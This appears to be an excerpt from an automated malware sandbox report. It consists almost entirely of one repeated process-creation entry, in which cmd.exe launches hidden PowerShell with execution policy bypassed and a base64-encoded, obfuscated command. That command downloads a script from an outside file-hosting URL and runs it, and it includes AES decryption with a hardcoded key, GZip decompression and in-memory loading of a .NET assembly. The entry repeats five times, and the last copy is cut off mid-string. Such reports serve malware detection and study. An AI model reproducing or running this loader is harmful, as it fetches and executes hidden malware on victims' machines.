                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvb